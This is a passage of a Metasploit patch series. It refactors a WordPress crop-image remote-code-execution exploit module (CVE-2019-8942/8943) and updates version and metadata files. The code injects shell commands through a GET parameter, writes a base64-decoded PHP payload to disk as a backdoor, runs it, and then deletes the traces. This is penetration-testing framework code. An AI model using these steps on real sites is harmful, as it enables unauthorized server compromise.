 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.2, MIT
-octokit, 4.13.0, MIT
+octokit, 4.14.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -133,4 +133,4 @@ warden, 1.2.7, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.18, MIT
+yard, 0.9.19, MIT
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 1304ebda59..fac5410e0a 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "5.0.15"
+      VERSION = "5.0.16"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

From 2884d9afcb2b0f4971dbda09aa3bc74d398cf849 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Thu, 4 Apr 2019 15:09:12 -0500
Subject: [PATCH 13/16] modified checks, added function

---
 modules/exploits/multi/http/wp_crop_rce.rb | 197 ++++++++++-----------
 1 file changed, 97 insertions(+), 100 deletions(-)

diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index 610a60ce41..3884ae4852 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie' => cookie
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
+    if res && res.code == 200 && res.body && !res.body.empty?
       res.get_hidden_inputs.first["_wpnonce"]
     end
   end
@@ -85,11 +85,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie'    => cookie,
       'vars_get'  => {
-        'post'   => "#{image_id}",
+        'post'   => image_id,
         'action' => "edit"
       }
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
+    if res && res.code == 200 && res.body && !res.body.empty?
       tmp = res.get_hidden_inputs
       wpnonce2 = tmp[1].first[1]
     end
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'    => 'GET',
       'uri'       => uri
     )
-    fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && res.body.length > 0
+    fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?
 
     theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
     fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'query[paged]' => '1'
       }
     )
-    fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && res.body.length > 0
+    fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?
     a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
     fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce
 
@@ -192,14 +192,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'data'     => post_data,
       'cookie'   => cookie
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      print_good("Image uploaded")
-      res = JSON.parse(res.body)
-      image_id = res["data"]["id"]
-      update_nonce = res["data"]["nonces"]["update"]
-      filename = res["data"]["filename"]
-      return filename, image_id, update_nonce
-    end
+    fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
+    print_good("Image uploaded")
+    res = JSON.parse(res.body)
+    image_id = res["data"]["id"]
+    update_nonce = res["data"]["nonces"]["update"]
+    filename = res["data"]["filename"]
+    return filename, image_id, update_nonce
   end
 
   def image_editor(img_name, ajax_nonce, image_id, cookie)
@@ -218,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'do' => 'save'
       }
     )
-    fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && res.body.length > 0
+    fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?
     filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
     fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename
 
@@ -267,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'      => uri,
       'cookie' => cookie
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
+    if res && res.code == 200 && res.body && !res.body.empty?
       wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
       post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
       fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id
@@ -287,38 +286,73 @@ class MetasploitModule < Msf::Exploit::Remote
           'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
         }
       )
-      if res && res.code == 302
-        post_id
-      end
+      fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302
+      post_id
     end
   end
 
+  def check_for_base64(cookie, post_id)
+    uri = normalize_uri(datastore['TARGETURI'])
+    # Test if base64 is on target
+    test_string = 'YmFzZTY0c3BvdHRlZAo='
+    res = send_request_cgi!(
+      'method'   => 'GET',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_get' => {
+        'p' => post_id,
+        '0' => "echo #{test_string} | base64 -d"
+      }
+    )
+    fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?
+
+    fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted")
+    # Execute payload with base64 decode
+    @backdoor = Rex::Text.rand_text_alpha(10)
+    encoded = Rex::Text.encode_base64(payload.encoded)
+    res = send_request_cgi!(
+      'method'   => 'GET',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_get' => {
+        'p' => post_id,
+        '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?
+    send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
+      'cookie'  =>  cookie
+    )
+  end
+
   def wp_cleanup(shell_name, post_id, cookie)
+    print_status('Attempting to clean up files...')
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
       'method'    => 'POST',
       'uri'       => uri,
       'cookie'    => cookie,
-      'vars_post'  => {
-          'action' => "query-attachments"
-      }
+      'vars_post'  => { 'action' => "query-attachments" }
     )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
-      id1, id2, id3 = infos[0], infos[2], infos[4]
-      delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
-      for i in (0...6).step(2)
-        res = send_request_cgi(
-          'method'    => 'POST',
-          'uri'       => uri,
-          'cookie'    => cookie,
-          'vars_post'  => {
-              'action' => "delete-post",
-              'id'     => "#{infos[i]}",
-              '_wpnonce' => "#{infos[i+1]}"
-          }
-        )
-      end
+
+    fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?
+    infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
+    id1, id2, id3 = infos[0], infos[2], infos[4]
+    delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
+    for i in (0...6).step(2)
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => uri,
+        'cookie'    => cookie,
+        'vars_post'  => {
+            'action' => "delete-post",
+            'id'     => infos[i],
+            '_wpnonce' => infos[i+1]
+        }
+      )
     end
 
     uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
@@ -328,7 +362,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie'    => cookie
     )
 
-    if res && res.code == 200 && res.body && res.body.length > 0
+    if res && res.code == 200 && res.body && !res.body.empty?
       post_nonce = res.body.scan(/post=#{post_id}&amp;action=trash&amp;_wpnonce=(\w+)/).flatten.first
       fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
       uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
@@ -338,39 +372,38 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri'       => uri2,
         'cookie'    => cookie,
         'vars_get'  => {
-          'post'     => "#{post_id}",
+          'post'     => post_id,
           'action'   => 'trash',
-          '_wpnonce' => "#{post_nonce}"
+          '_wpnonce' => post_nonce
         }
       )
 
-      if res && res.code == 302
-        res = send_request_cgi(
+      fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302
+      res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => uri1,
+        'cookie'    => cookie,
+        'vars_get'  => {
+          'post_status' => "trash",
+          'post_type'   => 'post',
+          '_wpnonce' => post_nonce
+        }
+      )
+
+      if res && res.code == 200 && res.body && !res.body.empty?
+        nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
+        fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
+
+        send_request_cgi(
           'method'    => 'GET',
-          'uri'       => uri1,
+          'uri'       => uri2,
           'cookie'    => cookie,
           'vars_get'  => {
-            'post_status' => "trash",
-            'post_type'   => 'post',
-            '_wpnonce' => "#{post_nonce}"
+            'post'     => post_id,
+            'action'   => 'delete',
+            '_wpnonce' => nonce
           }
         )
-
-        if res && res.code == 200 && res.body && res.body.length > 0
-          nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
-          fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
-
-          res = send_request_cgi(
-            'method'    => 'GET',
-            'uri'       => uri2,
-            'cookie'    => cookie,
-            'vars_get'  => {
-              'post'     => "#{post_id}",
-              'action'   => 'delete',
-              '_wpnonce' => "#{nonce}"
-            }
-          )
-        end
       end
     end
   end
@@ -405,44 +438,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Including into theme")
     post_id = include_theme(@shell_name, cookie)
-    uri = normalize_uri(datastore['TARGETURI'])
-    # Test if base64 is on target
-    test_string = 'YmFzZTY0c3BvdHRlZAo='
-    res = send_request_cgi!(
-      'method'   => 'GET',
-      'uri'      => uri,
-      'cookie' => cookie,
-      'vars_get' => {
-        'p' => "#{post_id}",
-        '0' => "echo #{test_string} | base64 -d"
-      }
-    )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      if res.body.include?("base64spotted")
-        # Execute payload with base64 decode
-        @backdoor = Rex::Text.rand_text_alpha(10)
-        encoded = Rex::Text.encode_base64(payload.encoded)
-        res = send_request_cgi!(
-          'method'   => 'GET',
-          'uri'      => uri,
-          'cookie' => cookie,
-          'vars_get' => {
-            'p' => "#{post_id}",
-            '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
-          }
-        )
-        if res && res.code == 200 && res.body && res.body.length > 0
-          uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
-          res = send_request_cgi(
-            'method'   => 'GET',
-            'uri'      => uri,
-            'cookie' => cookie
-          )
-        end
-      else
-        print_status("Can't find base64 decode on target.")
-      end
-    end
+
+    check_for_base64(cookie, post_id)
     wp_cleanup(@shell_name, post_id, cookie)
   end
 

From 6efd80e1397d83ea4866c8cb68ec5182f21aa0f8 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Thu, 4 Apr 2019 15:19:58 -0500
Subject: [PATCH 14/16] added note in info

---
 modules/exploits/multi/http/wp_crop_rce.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index 3884ae4852..60bb34f034 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -21,6 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
           reference during the upload. The second part of the exploit will include
           this image in the current theme by changing the _wp_page_template attribute
           when creating a post.
+
+          This exploit module only works for Unix-based systems currently.
       },
       'License'         => MSF_LICENSE,
       'Author'          =>

From 0c7e589db8f645c7daeb9c29f01118b9f1786570 Mon Sep 17 00:00:00 2001
From: Metasploit <metasploit@rapid7.com>
Date: Thu, 4 Apr 2019 13:32:00 -0700
Subject: [PATCH 15/16] automatic module_metadata_base.json update

---
 db/modules_metadata_base.json | 47 +++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)

diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 9203dbcb82..0ab3466a0b 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -66645,6 +66645,53 @@
     "notes": {
     }
   },
+  "exploit_multi/http/wp_crop_rce": {
+    "name": "WordPress Crop-image Shell Upload",
+    "full_name": "exploit/multi/http/wp_crop_rce",
+    "rank": 600,
+    "disclosure_date": "2019-02-19",
+    "type": "exploit",
+    "author": [
+      "RIPSTECH Technology",
+      "Wilfried Becard <wilfried.becard@synacktiv.com>"
+    ],
+    "description": "This module exploits a path traversal and a local file inclusion\n          vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n          The crop-image function allows a user, with at least author privileges,\n          to resize an image and perform a path traversal by changing the _wp_attached_file\n          reference during the upload. The second part of the exploit will include\n          this image in the current theme by changing the _wp_page_template attribute\n          when creating a post.\n\n          This exploit module only works for Unix-based systems currently.",
+    "references": [
+      "CVE-2019-8942",
+      "CVE-2019-8943",
+      "URL-https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "WordPress"
+    ],
+    "mod_time": "2019-04-04 15:19:58 +0000",
+    "path": "/modules/exploits/multi/http/wp_crop_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_crop_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
   "exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
     "name": "WordPress Ninja Forms Unauthenticated File Upload",
     "full_name": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",

From b2be6bb75caff4a56336edc37fb1092fb641395c Mon Sep 17 00:00:00 2001
From: Metasploit <metasploit@rapid7.com>
Date: Sat, 6 Apr 2019 13:52:56 -0700
Subject: [PATCH 16/16] automatic module_metadata_base.json update

---
 db/modules_metadata_base.json | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json
index 0ab3466a0b..1cc104949a 100644
--- a/db/modules_metadata_base.json
+++ b/db/modules_metadata_base.json
@@ -106985,7 +106985,7 @@
     "targets": [
       "Windows Powershell"
     ],
-    "mod_time": "2018-08-20 18:08:19 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
     "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb",
     "is_install_path": true,
     "ref_name": "windows/http/octopusdeploy_deploy",
@@ -112918,7 +112918,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
     "path": "/modules/exploits/windows/local/registry_persistence.rb",
     "is_install_path": true,
     "ref_name": "windows/local/registry_persistence",
@@ -113250,7 +113250,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
     "path": "/modules/exploits/windows/local/wmi.rb",
     "is_install_path": true,
     "ref_name": "windows/local/wmi",
@@ -122100,7 +122100,7 @@
       "DLL",
       "PSH"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
     "path": "/modules/exploits/windows/smb/smb_delivery.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/smb_delivery",